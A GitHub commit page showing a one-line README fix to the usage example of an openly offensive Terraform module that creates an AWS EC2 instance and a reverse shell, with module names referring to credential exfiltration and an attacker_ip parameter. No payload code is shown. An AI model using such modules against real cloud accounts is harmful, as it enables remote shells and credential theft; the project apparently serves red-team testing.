Skip to content

Commit 1a8cb20

Browse files
committed
Fix usage source path
1 parent cfc1251 commit 1a8cb20

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

README.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an
1111
## Usage
1212
```
1313
module "ec2_instance_credential_exfiltration" {
14-
source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
14+
source = "offensive-terraform/ec2-instance-reverse-shell/aws"
1515
1616
subnet_id = "subnet-0a4a1cc04"
1717
attacker_ip = "0.0.0.0"

0 commit comments

Comments
 (0)